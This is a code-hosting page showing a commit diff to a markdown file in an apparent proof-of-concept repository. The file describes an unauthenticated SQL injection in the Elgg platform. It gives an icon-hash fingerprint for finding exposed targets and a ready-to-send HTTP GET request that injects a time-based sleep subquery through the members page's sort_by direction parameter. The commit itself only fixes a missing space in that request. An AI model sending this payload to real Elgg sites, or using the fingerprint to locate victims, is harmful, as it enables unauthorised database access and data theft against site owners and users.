dontian122/POC
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix

Browse Source
This commit is contained in:
Kazgangap
2024-08-22 11:40:15 +03:00
parent ce32928ef5
commit ae80b9d536
1 changed files with 1 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
Elgg/elgg-sqli.md
View File

@@ -4,13 +4,11 @@
``` ```
icon_hash="413602919" icon_hash="413602919"
``` ```
## poc ## poc
``` ```
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a)HTTP/1.1 GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Host: Host:
``` ```
## Ref ## Ref
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md